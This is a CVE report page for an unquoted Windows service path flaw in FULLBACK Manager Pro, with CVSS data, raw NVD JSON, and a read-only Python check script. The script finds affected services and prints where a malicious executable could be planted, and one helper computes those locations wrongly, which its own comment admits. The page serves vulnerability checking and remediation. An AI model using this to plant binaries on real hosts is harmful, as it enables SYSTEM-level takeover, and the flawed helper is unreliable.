Security Vulnerability Report
CVE-2025-66461 CVSS 3.0: 6.7 MEDIUM (the raw record below also carries a CVSS 4.0 base score of 8.4 HIGH)

CVE-2025-66461

Published: 2025-12-08 10:16:02
Last Modified: 2026-04-15 00:35:42

Description

FULLBACK Manager Pro provided by GS Yuasa International Ltd. registers two Windows services with unquoted file paths. A user may execute arbitrary code with SYSTEM privilege if he/she has the write permission on the path to the directory where the affected product is installed.

CVSS Details

CVSS Score
6.7
Severity
MEDIUM
CVSS Vector
CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

FULLBACK Manager Pro: versions earlier than the fixed release published in December 2025

PoC / Exploit Code

⚠ For Security Research Only
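The following code is for security research and authorized testing only. As written, the script only queries service configuration with `sc` and prints what it finds; it does not create files, change service settings or restart services.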
python
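#!/usr/bin/env python3
"""
CVE-2025-66461 check - FULLBACK Manager Pro Unquoted Service Path (CWE-428)
Author: Security Researcher

Description:
    Enumerates Windows services whose service name or display name contains
    "FULLBACK", reads each service's BINARY_PATH_NAME with ``sc qc`` and
    reports the ones registered with an unquoted image path that contains
    spaces.

    The script is read-only: it runs ``sc query`` / ``sc qc`` and prints its
    findings. It does not write files, modify service configuration or
    restart anything.

Remediation (for whoever acts on the findings):
    * Install the vendor's fixed release (see JVN#59242986).
    * Until then, make sure the registered image path is enclosed in double
      quotes and that non-administrative principals cannot write to any
      directory along the install path.

Note: This code is for educational and authorized testing purposes only.
"""
import os
import sys
import subprocess
import time


def _parse_service_names(sc_query_output, needle="FULLBACK"):
    """Return service names from ``sc query`` output that match *needle*.

    A service matches when its SERVICE_NAME or its DISPLAY_NAME contains
    *needle* (case-insensitive). The SERVICE_NAME is what gets returned in
    both cases, because that is the identifier ``sc qc`` accepts.
    """
    wanted = needle.upper()
    names = []
    current = None
    for raw in sc_query_output.splitlines():
        label, sep, value = raw.partition(':')
        if not sep:
            continue
        label = label.strip().upper()
        value = value.strip()
        if label == 'SERVICE_NAME':
            current = value
        elif label != 'DISPLAY_NAME':
            # TYPE, STATE, ... lines are irrelevant for matching.
            continue
        if current and wanted in value.upper() and current not in names:
            names.append(current)
    return names


def _is_unquoted_with_spaces(binary_path):
    """Tell whether an image path is unquoted and has a space in the executable part.

    Only the portion up to the first ".exe" is inspected, so spaces that
    belong to command-line arguments do not cause a false positive and quotes
    that belong to arguments do not hide an unquoted executable path.
    This is a heuristic: an image path without ".exe" is judged on the whole
    string, and a directory name that itself contains ".exe" will confuse it.
    """
    value = binary_path.strip()
    if not value or value.startswith('"'):
        return False
    exe_end = value.lower().find('.exe')
    image = value[:exe_end + len('.exe')] if exe_end != -1 else value
    return ' ' in image


def check_service_paths():
    """Enumerate FULLBACK Manager Pro services.

    Returns:
        list[str]: service names (not display names) of every service whose
        name or display name contains "FULLBACK"; empty if ``sc`` could not
        be run.
    """
    print("[*] Enumerating FULLBACK Manager Pro services...")
    try:
        # "state= all" also lists stopped services; the argument list is
        # passed without a shell. errors="replace" keeps localized display
        # names from aborting the whole enumeration on a decode error.
        result = subprocess.run(
            ['sc', 'query', 'state=', 'all'],
            capture_output=True,
            text=True,
            errors='replace',
        )
    except (OSError, subprocess.SubprocessError) as e:
        print(f"[-] Error querying services: {e}")
        return []
    return _parse_service_names(result.stdout)


def check_unquoted_path(service_name):
    """Check if a service has an unquoted executable path.

    Args:
        service_name: service name as accepted by ``sc qc``.

    Returns:
        The full BINARY_PATH_NAME value when the executable part is unquoted
        and contains a space, otherwise None (also None when the query fails
        or no BINARY_PATH_NAME line is present).
    """
    try:
        # service_name is a single argv element, so it is never interpreted
        # by a shell.
        result = subprocess.run(
            ['sc', 'qc', service_name],
            capture_output=True,
            text=True,
            errors='replace',
        )
    except (OSError, subprocess.SubprocessError) as e:
        print(f"[-] Error checking service: {e}")
        return None

    for line in result.stdout.splitlines():
        if 'BINARY_PATH_NAME' not in line:
            continue
        # Split on the first colon only: the value itself contains "C:".
        _, _, value = line.partition(':')
        path = value.strip()
        if _is_unquoted_with_spaces(path):
            print(f"[+] VULNERABLE: {service_name}")
            print(f"[+] Unquoted path: {path}")
            return path
        print(f"[-] Not vulnerable: {service_name}")
        return None
    return None


def exploit_unquoted_path(base_path):
    """
    List path components with spaces for an unquoted service path.

    Pure string processing: nothing is created on disk. For every directory
    component of *base_path* that contains a space, one dict is returned with
    the keys 'directory', 'malicious_exe' and 'full_path'.

    NOTE(review): 'directory' and 'full_path' are built after the
    space-containing component has already been appended to the running
    prefix, so they point inside that directory. That does not match how
    Windows resolves an unquoted path, so do not use this list to decide
    which folders to audit. For remediation, review write ACLs on every
    ancestor directory of the service binary and quote the registered path.
    """
    path_parts = base_path.strip('"').split('\\')

    exploit_points = []
    current_path = ""
    for part in path_parts[:-1]:  # last element is the executable itself
        current_path += part + "\\"
        if ' ' in part and current_path.strip('\\'):
            first_token = part.split()[0]
            exploit_points.append({
                'directory': current_path,
                'malicious_exe': first_token + ".exe",
                'full_path': current_path + first_token + ".exe",
            })
    return exploit_points


def main():
    """Run the enumeration, the per-service path check and print the report."""
    print("=" * 60)
    print("CVE-2025-66461 PoC - FULLBACK Manager Pro")
    print("Unquoted Service Path Privilege Escalation")
    print("=" * 60)

    # Step 1: Enumerate services
    services = check_service_paths()
    if not services:
        print("[-] No FULLBACK Manager Pro services found")
        return

    # Step 2: Check for unquoted paths
    vulnerable_services = []
    for service in services:
        path = check_unquoted_path(service)
        if path:
            vulnerable_services.append({'service': service, 'path': path})

    if not vulnerable_services:
        print("[-] No vulnerable services found")
        return

    # Step 3: Report the space-containing components of each flagged path
    print("\n[*] Analyzing exploitation points...")
    for vuln in vulnerable_services:
        exploit_points = exploit_unquoted_path(vuln['path'])
        print(f"\n[+] Service: {vuln['service']}")
        print(f"[+] Original path: {vuln['path']}")
        print("[+] Potential exploitation points:")
        for point in exploit_points:
            print(f" - Create: {point['full_path']}")
            print(f" In directory: {point['directory']}")

    print("\n[*] Exploitation requires:")
    print(" 1. Write permission to intermediate directory")
    print(" 2. Service restart or system reboot")
    print(" 3. Malicious executable in exploitation point")
    print("\n[!] This PoC is for authorized testing only.")


if __name__ == "__main__":
    main()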

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66461", "sourceIdentifier": "[email protected]", "published": "2025-12-08T10:16:01.580", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "FULLBACK Manager Pro provided by GS Yuasa International Ltd. registers two Windows services with unquoted file paths. A user may execute arbitrary code with SYSTEM privilege if he/she has the write permission on the path to the directory where the affected product is installed."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", 
"vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-428"}]}], "references": [{"url": "https://jvn.jp/en/jp/JVN59242986/", "source": "[email protected]"}, {"url": "https://ps.gs-yuasa.com/technicalinfo/pdf/failure/FMP_info20251201_TEX48214-993.pdf", "source": "[email protected]"}]}}